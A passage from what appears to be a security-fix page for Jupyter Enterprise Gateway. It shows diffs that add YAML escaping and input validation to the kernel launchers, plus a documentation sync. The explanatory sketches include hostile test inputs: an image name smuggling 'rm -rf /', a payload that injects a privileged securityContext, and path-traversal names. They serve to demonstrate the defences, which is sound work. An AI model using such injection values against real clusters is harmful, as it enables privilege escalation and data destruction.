    +        r'^[a-zA-Z0-9][a-zA-Z0-9._\-/]*(:[a-zA-Z0-9._\-]+)?(@sha256:[a-f0-9]+)?$', image_name
    +    ):
    +        sys.exit(f"ERROR - KERNEL_IMAGE contains invalid characters: {image_name}")
    +
         # Container name is composed of KERNEL_USERNAME and KERNEL_ID
         container_name = os.environ.get("KERNEL_USERNAME", "") + "-" + kernel_id
     
    
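To see what the image-name check in the launch_docker.py change accepts, the sketch below applies the same pattern to a few sample names. The pattern is copied from the diff; the helper name `is_valid_image` and the sample inputs are hypothetical.

```python
import re

# Pattern copied from the launch_docker.py change.
IMAGE_PATTERN = re.compile(
    r'^[a-zA-Z0-9][a-zA-Z0-9._\-/]*(:[a-zA-Z0-9._\-]+)?(@sha256:[a-f0-9]+)?$'
)


def is_valid_image(image_name: str) -> bool:
    """Return True when the name matches the pattern from the patch."""
    return IMAGE_PATTERN.match(image_name) is not None


# Hypothetical inputs: two ordinary names and two hostile ones.
candidates = [
    "elyra/kernel-py:3.2.3",
    "registry.example.com/org/image:v1.2.3",
    "nginx; rm -rf /",
    "nginx\nmalicious: true",
]
results = {name: is_valid_image(name) for name in candidates}

for name, ok in results.items():
    print(repr(name), ok)
```

Names containing spaces, semicolons, or embedded line breaks followed by further text are rejected. As written, the pattern also appears to reject a registry host that includes a port, such as `localhost:5000/image`, because the tag group does not allow a slash.
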
  • etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2+15 15 modified
    @@ -10,18 +10,18 @@
     apiVersion: v1
     kind: Pod
     metadata:
    -  name: "{{ kernel_pod_name }}"
    -  namespace: "{{ kernel_namespace }}"
    +  name: {{ kernel_pod_name | yaml_safe }}
    +  namespace: {{ kernel_namespace | yaml_safe }}
       labels:
    -    kernel_id: "{{ kernel_id }}"
    +    kernel_id: {{ kernel_id | yaml_safe }}
         app: enterprise-gateway
         component: kernel
         source: kernel-pod.yaml
       annotations:
         cluster-autoscaler.kubernetes.io/safe-to-evict: "false"
     spec:
       restartPolicy: Never
    -  serviceAccountName: "{{ kernel_service_account_name }}"
    +  serviceAccountName: {{ kernel_service_account_name | yaml_safe }}
     # NOTE: that using runAsGroup requires that feature-gate RunAsGroup be enabled.
     # WARNING: Only using runAsUser w/o runAsGroup or NOT enabling the RunAsGroup feature-gate
     # will result in the new kernel pod's effective group of 0 (root)! although the user will
    @@ -40,8 +40,8 @@ spec:
         fsGroup: 100
       {% endif %}
       containers:
    -  - image: "{{ kernel_image }}"
    -    name: "{{ kernel_pod_name }}"
    +  - image: {{ kernel_image | yaml_safe }}
    +    name: {{ kernel_pod_name | yaml_safe }}
         env:
     # Add any custom envs here that aren't already configured for the kernel's environment
     #    - name: MY_CUSTOM_ENV
    @@ -51,42 +51,42 @@ spec:
           {% if kernel_cpus is defined or kernel_memory is defined or kernel_gpus is defined %}
           requests:
             {% if kernel_cpus is defined %}
    -        cpu: "{{ kernel_cpus }}"
    +        cpu: {{ kernel_cpus | yaml_safe }}
             {% endif %}
             {% if kernel_memory is defined %}
    -        memory: "{{ kernel_memory }}"
    +        memory: {{ kernel_memory | yaml_safe }}
             {% endif %}
             {% if kernel_gpus is defined %}
    -        nvidia.com/gpu: "{{ kernel_gpus }}"
    +        nvidia.com/gpu: {{ kernel_gpus | yaml_safe }}
             {% endif %}
           {% endif %}
           {% if kernel_cpus_limit is defined or kernel_memory_limit is defined or kernel_gpus_limit is defined %}
           limits:
             {% if kernel_cpus_limit is defined %}
    -        cpu: "{{ kernel_cpus_limit }}"
    +        cpu: {{ kernel_cpus_limit | yaml_safe }}
             {% endif %}
             {% if kernel_memory_limit is defined %}
    -        memory: "{{ kernel_memory_limit }}"
    +        memory: {{ kernel_memory_limit | yaml_safe }}
             {% endif %}
             {% if kernel_gpus_limit is defined %}
    -        nvidia.com/gpu: "{{ kernel_gpus_limit }}"
    +        nvidia.com/gpu: {{ kernel_gpus_limit | yaml_safe }}
             {% endif %}
           {% endif %}
         {% endif %}
         {% if kernel_working_dir %}
    -    workingDir: "{{ kernel_working_dir }}"
    +    workingDir: {{ kernel_working_dir | yaml_safe }}
         {% endif %}
         volumeMounts:
     # Define any "unconditional" mounts here, followed by "conditional" mounts that vary per client
         {% if kernel_volume_mounts %}
           {% for volume_mount in kernel_volume_mounts %}
    -    - {{ volume_mount }}
    +    - {{ volume_mount | yaml_safe }}
           {% endfor %}
         {% endif %}
       volumes:
     # Define any "unconditional" volumes here, followed by "conditional" volumes that vary per client
       {% if kernel_volumes %}
         {% for volume in kernel_volumes %}
    -  - {{ volume }}
    +  - {{ volume | yaml_safe }}
         {% endfor %}
       {% endif %}
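
The template change above replaces literal quotes around raw values with an escaping filter. A minimal sketch of why that matters follows, under several assumptions: `str.format` stands in for Jinja2, `json.dumps` stands in for the `yaml_safe` filter (which in the patch is backed by `yaml.dump`), the payload is made up rather than taken from the PoC, and the pre-patch `yaml.safe_load` step on the environment value is ignored.

```python
import json

# Hypothetical single-line fragments mirroring the before/after forms in the diff.
OLD_LINE = '    workingDir: "{value}"'  # literal quotes wrapped around the raw value
NEW_LINE = '    workingDir: {value}'    # value arrives already quoted and escaped


def render_old(value: str) -> str:
    """Pre-patch style: the raw value is dropped between two literal quotes."""
    return OLD_LINE.format(value=value)


def render_new(value: str) -> str:
    """Post-patch style: escape first, then interpolate (json.dumps is a stand-in)."""
    return NEW_LINE.format(value=json.dumps(value))


# Made-up payload: closes the opening quote, adds sibling keys, then reopens a quote
# so the template's trailing quote still balances.
payload = '/tmp"\n    securityContext:\n      privileged: true\n    x: "'

print(render_old(payload))  # several YAML lines, including an injected securityContext
print(render_new(payload))  # one line; the quote and newlines are escaped inside the scalar
```

In the old form the payload's own quote ends the scalar, so everything after it is read as YAML structure. In the new form the quote and newlines are escaped, and the whole payload stays inside a single string value.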
    
  • etc/kernel-launchers/kubernetes/scripts/launch_kubernetes.py · +52 -6 · modified
    @@ -15,6 +15,26 @@
     
     KERNEL_POD_TEMPLATE_PATH = "/kernel-pod.yaml.j2"
     
    +ALLOWED_K8S_KINDS = {"Pod", "Secret", "PersistentVolumeClaim", "PersistentVolume", "Service", "ConfigMap"}
    +MAX_DOCUMENTS_PER_KIND = 1
    +YAML_PARSED_KERNEL_VARS = {"KERNEL_VOLUME_MOUNTS", "KERNEL_VOLUMES"}
    +
    +
    +def yaml_safe_str(value):
    +    """Escape a value for safe inclusion in a YAML template.
    +
    +    Uses PyYAML's own serializer to produce properly escaped output:
    +    - Strings are double-quoted with special characters escaped.
    +    - Dicts/lists are serialized as YAML flow mappings/sequences.
    +    - None, bools, and numbers are serialized to their YAML-canonical form.
    +    """
    +    if isinstance(value, str):
    +        return yaml.dump(value, default_style='"', width=10000).strip()
    +    if isinstance(value, (dict, list)):
    +        return yaml.dump(value, default_flow_style=True, width=10000).strip()
    +    # yaml.dump appends a document-end marker ("...\n") for scalars; strip it
    +    return yaml.dump(value, width=10000).replace("\n...", "").strip()
    +
     
     def generate_kernel_pod_yaml(keywords):
         """Return the kubernetes pod spec as a yaml string.
    @@ -35,9 +55,8 @@ def generate_kernel_pod_yaml(keywords):
                 default=True,
             ),
         )
    -    # jinja2 template substitutes template variables with None though keywords doesn't
    -    # contain corresponding item. Therefore, no need to check if any are left unsubstituted.
    -    # Kubernetes API server will validate the pod spec instead.
    +    j_env.filters["yaml_safe"] = yaml_safe_str
    +
         k8s_yaml = j_env.get_template(KERNEL_POD_TEMPLATE_PATH).render(**keywords)
     
         return k8s_yaml
    @@ -128,10 +147,20 @@ def launch_kubernetes_kernel(
         )
     
         # Walk env variables looking for names prefixed with KERNEL_.  When found, set corresponding keyword value
    -    # with name in lower case.
    +    # with name in lower case.  Only parse YAML for variables that legitimately carry structured data
    +    # (lists/dicts); treat all others as raw strings to prevent YAML injection attacks.
         for name, value in os.environ.items():
             if name.startswith("KERNEL_"):
    -            keywords[name.lower()] = yaml.safe_load(value)
    +            if name in YAML_PARSED_KERNEL_VARS:
    +                parsed = yaml.safe_load(value)
    +                if not isinstance(parsed, list) or not all(isinstance(item, dict) for item in parsed):
    +                    sys.exit(
    +                        f"ERROR - {name} must be a YAML list of mappings - "
    +                        f"kernel launch terminating!"
    +                    )
    +                keywords[name.lower()] = parsed
    +            else:
    +                keywords[name.lower()] = value
     
         # Substitute all template variable (wrapped with {{ }}) and generate `yaml` string.
         k8s_yaml = generate_kernel_pod_yaml(keywords)
    @@ -146,7 +175,24 @@ def launch_kubernetes_kernel(
         pod_template = None
         pod_created = None
         kernel_namespace = keywords["kernel_namespace"]
    -    k8s_objs = yaml.safe_load_all(k8s_yaml)
    +    k8s_objs = list(yaml.safe_load_all(k8s_yaml))
    +    kind_counts: Dict[str, int] = {}
    +    for k8s_obj in k8s_objs:
    +        if not k8s_obj:
    +            continue
    +        kind = k8s_obj.get("kind")
    +        if kind not in ALLOWED_K8S_KINDS:
    +            sys.exit(
    +                f"ERROR - Unexpected resource kind '{kind}' in rendered manifest - "
    +                f"kernel launch terminating!"
    +            )
    +        kind_counts[kind] = kind_counts.get(kind, 0) + 1
    +    for kind, count in kind_counts.items():
    +        if count > MAX_DOCUMENTS_PER_KIND:
    +            sys.exit(
    +                f"ERROR - Rendered manifest contains {count} '{kind}' documents "
    +                f"(max {MAX_DOCUMENTS_PER_KIND}) - kernel launch terminating!"
    +            )
         for k8s_obj in k8s_objs:
             if k8s_obj.get("kind"):
                 if k8s_obj["kind"] == "Pod":
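
The post-render validation added in this file can be sketched on plain dictionaries, without a YAML parser. The function name `find_manifest_violation` is hypothetical, and it returns a message instead of calling `sys.exit` as the patch does, so that it can be tested. The two constants are copied from the diff.

```python
from typing import Dict, Iterable, Optional

# Constants copied from the launch_kubernetes.py diff above.
ALLOWED_K8S_KINDS = {"Pod", "Secret", "PersistentVolumeClaim", "PersistentVolume", "Service", "ConfigMap"}
MAX_DOCUMENTS_PER_KIND = 1


def find_manifest_violation(docs: Iterable[Optional[dict]]) -> Optional[str]:
    """Hypothetical helper: return a description of the first policy violation, or None."""
    kind_counts: Dict[str, int] = {}
    for doc in docs:
        if not doc:
            continue  # empty YAML documents are skipped, as in the patch
        kind = doc.get("kind")
        if kind not in ALLOWED_K8S_KINDS:
            return f"unexpected resource kind {kind!r}"
        kind_counts[kind] = kind_counts.get(kind, 0) + 1
    for kind, count in kind_counts.items():
        if count > MAX_DOCUMENTS_PER_KIND:
            return f"{count} {kind!r} documents (max {MAX_DOCUMENTS_PER_KIND})"
    return None


# Illustrative document lists, as yaml.safe_load_all might yield them.
print(find_manifest_violation([{"kind": "Pod"}]))
print(find_manifest_violation([{"kind": "Pod"}, {"kind": "Pod"}]))
print(find_manifest_violation([{"kind": "Pod"}, {"kind": "ClusterRoleBinding"}]))
```

This check runs on the rendered manifest, after the `yaml_safe` filter has been applied, so it appears to act as a second layer: even if a value slipped past escaping, a second Pod or a resource of an unlisted kind would stop the launch.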
    
  • etc/kernel-launchers/operators/scripts/launch_custom_resource.py · +38 -1 · modified
    @@ -2,6 +2,7 @@
     """Launch a custom operator resource."""
     import argparse
     import os
    +import re
     import sys
     
     import urllib3
    @@ -11,6 +12,24 @@
     
     urllib3.disable_warnings()
     
    +YAML_PARSED_KERNEL_VARS = {"KERNEL_VOLUME_MOUNTS", "KERNEL_VOLUMES"}
    +
    +
    +def yaml_safe_str(value):
    +    """Escape a value for safe inclusion in a YAML template.
    +
    +    Uses PyYAML's own serializer to produce properly escaped output:
    +    - Strings are double-quoted with special characters escaped.
    +    - Dicts/lists are serialized as YAML flow mappings/sequences.
    +    - None, bools, and numbers are serialized to their YAML-canonical form.
    +    """
    +    if isinstance(value, str):
    +        return yaml.dump(value, default_style='"', width=10000).strip()
    +    if isinstance(value, (dict, list)):
    +        return yaml.dump(value, default_flow_style=True, width=10000).strip()
    +    # yaml.dump appends a document-end marker ("...\n") for scalars; strip it
    +    return yaml.dump(value, width=10000).replace("\n...", "").strip()
    +
     
     def generate_kernel_custom_resource_yaml(kernel_crd_template, keywords):
         """Generate the kernel custom resource yaml given a template."""
    @@ -27,6 +46,8 @@ def generate_kernel_custom_resource_yaml(kernel_crd_template, keywords):
                 default=True,
             ),
         )
    +    j_env.filters["yaml_safe"] = yaml_safe_str
    +
         k8s_yaml = j_env.get_template("/" + kernel_crd_template + ".yaml.j2").render(**keywords)
         return k8s_yaml
     
    @@ -70,18 +91,34 @@ def launch_custom_resource_kernel(
         )
         keywords["spark_context_initialization_mode"] = spark_context_init_mode
     
    +    # Only parse YAML for variables that legitimately carry structured data (lists/dicts);
    +    # treat all others as raw strings to prevent YAML injection attacks.
         for name, value in os.environ.items():
             if name.startswith("KERNEL_"):
    -            keywords[name.lower()] = yaml.safe_load(value)
    +            if name in YAML_PARSED_KERNEL_VARS:
    +                parsed = yaml.safe_load(value)
    +                if not isinstance(parsed, list) or not all(isinstance(item, dict) for item in parsed):
    +                    sys.exit(
    +                        f"ERROR - {name} must be a YAML list of mappings - "
    +                        f"kernel launch terminating!"
    +                    )
    +                keywords[name.lower()] = parsed
    +            else:
    +                keywords[name.lower()] = value
     
         kernel_crd_template = keywords["kernel_crd_group"] + "-" + keywords["kernel_crd_version"]
    +    if not re.match(r'^[a-z0-9][a-z0-9.\-]*-v[a-z0-9]+$', kernel_crd_template):
    +        sys.exit(f"ERROR - Invalid CRD template name: {kernel_crd_template} - kernel launch terminating!")
    +
         custom_resource_yaml = generate_kernel_custom_resource_yaml(kernel_crd_template, keywords)
     
         kernel_namespace = keywords["kernel_namespace"]
         group = keywords["kernel_crd_group"]
         version = keywords["kernel_crd_version"]
         plural = keywords["kernel_crd_plural"]
         custom_resource_object = yaml.safe_load(custom_resource_yaml)
    +    if not isinstance(custom_resource_object, dict) or "kind" not in custom_resource_object:
    +        sys.exit("ERROR - Rendered CRD manifest is not a valid single-document YAML - kernel launch terminating!")
         if group == "sparkoperator.k8s.io":
             extend_operator_env(custom_resource_object, "driver")
             extend_operator_env(custom_resource_object, "executor")
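
In this launcher the template file name is built from `kernel_crd_group` and `kernel_crd_version`, so those values influence which file Jinja2 loads. The sketch below reuses the regular expression from the diff in a hypothetical helper, `crd_template_path`, which raises `ValueError` where the patch calls `sys.exit`. The inputs are invented for illustration.

```python
import re

# Pattern copied verbatim from the launch_custom_resource.py diff above.
CRD_TEMPLATE_PATTERN = r'^[a-z0-9][a-z0-9.\-]*-v[a-z0-9]+$'


def crd_template_path(group: str, version: str) -> str:
    """Hypothetical helper: validate the name, then build the path the launcher would load."""
    name = group + "-" + version
    if not re.match(CRD_TEMPLATE_PATTERN, name):
        raise ValueError(f"Invalid CRD template name: {name}")
    return "/" + name + ".yaml.j2"


# The group and version shipped with the Spark operator template pass the check.
print(crd_template_path("sparkoperator.k8s.io", "v1beta2"))

# Made-up traversal attempts are rejected because '/' is outside the allowed
# character class and the name must start with a lowercase letter or digit.
for bad_group in ("../../tmp/evil", "a/../../tmp/evil"):
    try:
        crd_template_path(bad_group, "v1")
    except ValueError as err:
        print(err)
```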
    
  • etc/kernel-launchers/operators/scripts/sparkoperator.k8s.io-v1beta2.yaml.j2 · +16 -16 · modified
    @@ -1,26 +1,26 @@
     apiVersion: "sparkoperator.k8s.io/v1beta2"
     kind: SparkApplication
     metadata:
    -  name: {{ kernel_resource_name }}
    +  name: {{ kernel_resource_name | yaml_safe }}
     spec:
       restartPolicy:
         type: Never
       type: Python
       pythonVersion: "3"
       sparkVersion: 2.4.5
    -  image: {{ kernel_image }}
    +  image: {{ kernel_image | yaml_safe }}
       mainApplicationFile: "local:///usr/local/bin/kernel-launchers/python/scripts/launch_ipykernel.py"
       arguments:
         - "--kernel-id"
    -    - "{{ kernel_id }}"
    +    - {{ kernel_id | yaml_safe }}
         - "--spark-context-initialization-mode"
    -    - "{{ spark_context_initialization_mode }}"
    +    - {{ spark_context_initialization_mode | yaml_safe }}
         - "--response-address"
    -    - "{{ eg_response_address }}"
    +    - {{ eg_response_address | yaml_safe }}
         - "--port-range"
    -    - "{{ eg_port_range }}"
    +    - {{ eg_port_range | yaml_safe }}
         - "--public-key"
    -    - "{{ eg_public_key }}"
    +    - {{ eg_public_key | yaml_safe }}
       driver:
         annotations:
           cluster-autoscaler.kubernetes.io/safe-to-evict: "false"
    @@ -30,9 +30,9 @@ spec:
     # e.g., helm install my-release spark-operator/spark-operator --namespace spark-operator --set webhook.enable=true
     #    - name: MY_DRIVER_ENV
     #      value: "my_driver_value"
    -    serviceAccount: "{{ kernel_service_account_name }}"
    +    serviceAccount: {{ kernel_service_account_name | yaml_safe }}
         labels:
    -      kernel_id: "{{ kernel_id }}"
    +      kernel_id: {{ kernel_id | yaml_safe }}
           app: enterprise-gateway
           component: kernel
         cores: 1
    @@ -41,13 +41,13 @@ spec:
         volumeMounts:
           {% if kernel_volume_mounts is defined %}
             {% for mount in kernel_volume_mounts %}
    -      - {{ mount }}
    +      - {{ mount | yaml_safe }}
             {% endfor %}
           {% endif %}
         volumes:
           {% if kernel_volumes is defined %}
             {% for volume in kernel_volumes %}
    -      - {{ volume }}
    +      - {{ volume | yaml_safe }}
             {% endfor %}
           {% endif %}
       executor:
    @@ -58,26 +58,26 @@ spec:
     #    - name: MY_EXECUTOR_ENV
     #      value: "my_executor_value"
         labels:
    -      kernel_id: "{{ kernel_id }}"
    +      kernel_id: {{ kernel_id | yaml_safe }}
           app: enterprise-gateway
           component: worker
    -    image: {{ kernel_executor_image }}
    +    image: {{ kernel_executor_image | yaml_safe }}
         instances: 2
         cores: 1
         coreLimit: 1000m
         memory: 1g
         volumeMounts:
           {% if kernel_volume_mounts is defined %}
             {% for mount in kernel_volume_mounts %}
    -      - {{ mount }}
    +      - {{ mount | yaml_safe }}
             {% endfor %}
           {% endif %}
         volumes:
           {% if kernel_volumes is defined %}
             {% for volume in kernel_volumes %}
    -      - {{ volume }}
    +      - {{ volume | yaml_safe }}
             {% endfor %}
           {% endif %}
     {% if kernel_sparkapp_config_map %}
    -  sparkConfigMap: {{ kernel_sparkapp_config_map }}
    +  sparkConfigMap: {{ kernel_sparkapp_config_map | yaml_safe }}
     {% endif %}
    
577511b76e42

Sync documentation with latest implementation

https://github.com/jupyter-server/enterprise_gateway · Luciano Resende · Apr 23, 2026 · Fixed in 3.3.0 · via ghsa-release-walk
12 files changed · +93 -33
  • docs/source/contributors/docker.md · +4 -0 · modified
    @@ -4,6 +4,10 @@ All docker images can be pulled from docker hub's [elyra organization](https://h
     
     Local images can also be built via `make docker-images`.
     
    +```{note}
    +Base images and versions change over time. Check the Dockerfiles in [etc/docker](https://github.com/jupyter-server/enterprise_gateway/tree/main/etc/docker) for the current base images used in each build.
    +```
    +
     The following sections describe the docker images used within Kubernetes and Docker Swarm environments.
     
     ## elyra/enterprise-gateway
    
  • docs/source/contributors/roadmap.md · +12 -6 · modified
    @@ -2,23 +2,29 @@
     
     We have plenty to do, now and in the future. Here's where we're headed:
     
    -## Planned for 3.0
    +## Completed in 3.x
     
    -- Spark 3.0 support
    -  - Includes pod template files
    +- Spark 3.0 support (including pod template files)
    +- Spark Operator support via `SparkOperatorProcessProxy`
    +- Custom Resource Definition support via `CustomResourceProcessProxy`
    +- Session persistence (file-based and webhook-based)
    +- `KERNEL_VOLUMES` and `KERNEL_VOLUME_MOUNTS` for Kubernetes and Spark Operator kernels
    +- Authorizer class override support (`EG_AUTHORIZER_CLASS`)
    +- SSTI prevention in `KERNEL_POD_NAME` template substitution
    +- Python 3.9 and below dropped; Python 3.10+ required
     
     ## Planned for 4.0
     
     - Kernel Provisioners
    -  - Provisioners will replace process proxies and enable Enterprise Gateway to remove its cap on `jupyter_client < 7`.
    +  - Provisioners will replace process proxies and enable Enterprise Gateway to remove its cap on `jupyter_client < 7` and `jupyter_server < 2`.
     - Parameterized Kernels
       - Enable the ability to prompt for parameters
    -  - These will likely be based on kernel provisioners (4.0)
    +  - These will likely be based on kernel provisioners
     
     ## Wish list
     
     - High Availability
    -  - Session persistence using a shared location (NoSQL DB) (File persistence has been implemented)
    +  - Session persistence using a shared location (NoSQL DB) (file-based persistence has been implemented)
       - Active/active support
     - Multi-gateway support on client-side
       - Enables the ability for a single Jupyter Server to be configured against multiple Gateway servers simultaneously. This work will primarily be in Jupyter Server.
    
  • docs/source/contributors/system-architecture.md · +17 -0 · modified
    @@ -153,6 +153,23 @@ required to be located within the Enterprise Gateway hierarchy - i.e., we embrac
     
     ![Process Class Hierarchy](../images/process_proxy_hierarchy.png)
     
    +The complete process proxy class hierarchy is:
    +
    +```text
    +BaseProcessProxyABC
    +├── LocalProcessProxy
    +└── RemoteProcessProxy
    +    ├── DistributedProcessProxy
    +    ├── YarnClusterProcessProxy
    +    ├── ConductorClusterProcessProxy
    +    └── ContainerProcessProxy
    +        ├── DockerSwarmProcessProxy
    +        ├── DockerProcessProxy
    +        └── KubernetesProcessProxy
    +            └── CustomResourceProcessProxy
    +                └── SparkOperatorProcessProxy
    +```
    +
     The process proxy constructor looks as follows:
     
     ```python
    
  • docs/source/developers/dev-process-proxy.md · +4 -4 · modified
    @@ -1,6 +1,6 @@
     # Implementing a process proxy
     
    -A process proxy implementation is necessary if you want to interact with a resource manager that is not currently supported or extend some existing behaviors. For example, recently, we've had [contributions](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/enterprise_gateway/services/processproxies/crd.py#L9) that interact with [Kubernetes Custom Resource Definitions](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/#customresourcedefinitions), which is an example of _extending_ the `KubernetesProcessProxy` to accomplish a slightly different task.
    +A process proxy implementation is necessary if you want to interact with a resource manager that is not currently supported or extend some existing behaviors. For example, recently, we've had [contributions](https://github.com/jupyter-server/enterprise_gateway/blob/main/enterprise_gateway/services/processproxies/crd.py#L18) that interact with [Kubernetes Custom Resource Definitions](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/#customresourcedefinitions), which is an example of _extending_ the `KubernetesProcessProxy` to accomplish a slightly different task.
     
     Examples of resource managers in which there's been some interest include [Slurm Workload Manager](https://slurm.schedmd.com/documentation.html) and [Apache Mesos](https://mesos.apache.org/), for example. In the end, it's really a matter of having access to an API and the ability to apply "tags" or "labels" in order to _discover_ where the kernel is running within the managed cluster. Once you have that information, then it becomes of matter of implementing the appropriate methods to control the kernel's lifecycle.
     
    @@ -18,7 +18,7 @@ That said, if you and your organization plan to stay on Enterprise Gateway 2.x o
     
     Please refer to the [Process Proxy section](../contributors/system-architecture.md#process-proxy) in the System Architecture pages for descriptions and structure of existing process proxies. Here is the general guideline for the process of implementing a process proxy.
     
    -1. Identify and understand how to _decorate_ your "job" within the resource manager. In Hadoop YARN, this is done by using the kernel's ID as the _application name_ by setting the [`--name` parameter to `${KERNEL_ID}`](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/etc/kernelspecs/spark_python_yarn_cluster/kernel.json#L14). In Kubernetes, we apply the kernel's ID to the [`kernel-id` label on the POD](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L16).
    +1. Identify and understand how to _decorate_ your "job" within the resource manager. In Hadoop YARN, this is done by using the kernel's ID as the _application name_ by setting the [`--name` parameter to `${KERNEL_ID}`](https://github.com/jupyter-server/enterprise_gateway/blob/main/etc/kernelspecs/spark_python_yarn_cluster/kernel.json). In Kubernetes, we apply the kernel's ID to the [`kernel-id` label on the POD](https://github.com/jupyter-server/enterprise_gateway/blob/main/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2).
     1. Today, all invocations of kernels into resource managers use a shell or python script mechanism configured into the `argv` stanza of the kernelspec. If you take this approach, you need to apply the necessary changes to integrate with your resource manager.
     1. Determine how to interact with the resource manager's API to _discover_ the kernel and determine on which host it's running. This interaction should occur immediately following Enterprise Gateway's receipt of the kernel's connection information in its response from the kernel launcher. This extra step, performed within `confirm_remote_startup()`, is necessary to get the appropriate host name as reflected in the resource manager's API.
     1. Determine how to monitor the "job" using the resource manager API. This will become part of the `poll()` implementation to determine if the kernel is still running. This should be as quick as possible since it occurs every 3 seconds. If this is an expensive call, you may need to make some adjustments like skip the call every so often.
    @@ -30,8 +30,8 @@ Because kernel IDs are globally unique, they serve as ideal identifiers for disc
     
     You will likely need to provide implementations for `launch_process()`, `poll()`, `wait()`, `send_signal()`, and `kill()`, although, depending on where your process proxy resides in the class hierarchy, some implementations may be reused.
     
    -For example, if your process proxy is going to service remote kernels, you should consider deriving your implementation from the [`RemoteProcessProxy` class](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/enterprise_gateway/services/processproxies/processproxy.py#L981). If this is the case, then you'll need to implement `confirm_remote_startup()`.
    +For example, if your process proxy is going to service remote kernels, you should consider deriving your implementation from the [`RemoteProcessProxy` class](https://github.com/jupyter-server/enterprise_gateway/blob/main/enterprise_gateway/services/processproxies/processproxy.py#L1070). If this is the case, then you'll need to implement `confirm_remote_startup()`.
     
    -Likewise, if your process proxy is based on containers, you should consider deriving your implementation from the [`ContainerProcessProxy`](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/enterprise_gateway/services/processproxies/container.py#L34). If this is the case, then you'll need to implement `get_container_status()` and `terminate_container_resources()` rather than `confirm_remote_startup()`, etc.
    +Likewise, if your process proxy is based on containers, you should consider deriving your implementation from the [`ContainerProcessProxy`](https://github.com/jupyter-server/enterprise_gateway/blob/main/enterprise_gateway/services/processproxies/container.py#L39). If this is the case, then you'll need to implement `get_container_status()` and `terminate_container_resources()` rather than `confirm_remote_startup()`, etc.
     
     Once the process proxy has been implemented, construct an appropriate kernel specification that references your process proxy and iterate until you are satisfied with how your remote kernels behave.
    
  • docs/source/developers/kernel-launcher.md · +4 -4 · modified
    @@ -21,15 +21,15 @@ The port used between Enterprise Gateway and the launcher, known as the _communi
     
     ## Encrypting the connection information
     
    -The next task of the kernel launcher is sending the connection information back to the Enterprise Gateway server. Prior to doing this, the connection information, including the communication port, are encrypted using AES encryption and a 16-byte key. The AES key is then encrypted using the public key specified in the `public_key` parameter. These two fields (the AES-encrypted payload and the publice-key-encrypted AES key) are then included into a JSON structure that also include the launcher's version information and base64 encoded. Here's such an example from the [Python kernel launcher](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/etc/kernel-launchers/python/scripts/launch_ipykernel.py#L188-L209).
    +The next task of the kernel launcher is sending the connection information back to the Enterprise Gateway server. Prior to doing this, the connection information, including the communication port, are encrypted using AES encryption and a 16-byte key. The AES key is then encrypted using the public key specified in the `public_key` parameter. These two fields (the AES-encrypted payload and the publice-key-encrypted AES key) are then included into a JSON structure that also include the launcher's version information and base64 encoded. Here's such an example from the [Python kernel launcher](https://github.com/jupyter-server/enterprise_gateway/blob/main/etc/kernel-launchers/python/scripts/launch_ipykernel.py#L207).
     
    -The payload is then [sent back on a socket](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/etc/kernel-launchers/python/scripts/launch_ipykernel.py#L212-L256) identified by the `--response-address` option.
    +The payload is then [sent back on a socket](https://github.com/jupyter-server/enterprise_gateway/blob/main/etc/kernel-launchers/python/scripts/launch_ipykernel.py#L235) identified by the `--response-address` option.
     
     ## Invoking the target kernel
     
    -For the R kernel launcher, the kernel is started using [`IRKernel::main()`](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/etc/kernel-launchers/R/scripts/launch_IRkernel.R#L252) after the `SparkContext` is initialized based on the `spark-context-initialization-mode` parameter.
    +For the R kernel launcher, the kernel is started using [`IRKernel::main()`](https://github.com/jupyter-server/enterprise_gateway/blob/main/etc/kernel-launchers/R/scripts/launch_IRkernel.R#L256) after the `SparkContext` is initialized based on the `spark-context-initialization-mode` parameter.
     
    -The scala kernel launcher works similarly in that the Apache Toree kernel provides an ["entrypoint" to start the kernel](https://github.com/jupyter-server/enterprise_gateway/blob/00d7376b932eacd347b3c32c863691bfbad53b86/etc/kernel-launchers/scala/toree-launcher/src/main/scala/launcher/ToreeLauncher.scala#L332), however, because the Toree kernel initializes a `SparkContext` itself, the need to do so is conveyed directly to the kernel.
    +The scala kernel launcher works similarly in that the Apache Toree kernel provides an ["entrypoint" to start the kernel](https://github.com/jupyter-server/enterprise_gateway/blob/main/etc/kernel-launchers/scala/toree-launcher/src/main/scala/launcher/ToreeLauncher.scala#L315), however, because the Toree kernel initializes a `SparkContext` itself, the need to do so is conveyed directly to the kernel.
     
     For the Python kernel launcher, it creates a namespace instance that contains the `SparkContext` information, if requested to do so via the `spark-context-initialization-mode` parameter, instantiates an `IPKernelApp` instance using the configured namespace, then calls the [`start()`](https://github.com/ipython/ipykernel/blob/6f448d280dadbff7245f4b28b5e210c899d79342/ipykernel/kernelapp.py#L694) method.
     
    
  • docs/source/developers/kernel-specification.md · +2 -2 · modified
    @@ -21,8 +21,8 @@ Here's an example from the [`spark_python_yarn_cluster`](https://github.com/jupy
       "env": {
         "SPARK_HOME": "/usr/hdp/current/spark2-client",
         "PYSPARK_PYTHON": "/opt/conda/bin/python",
    -    "PYTHONPATH": "${HOME}/.local/lib/python3.8/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
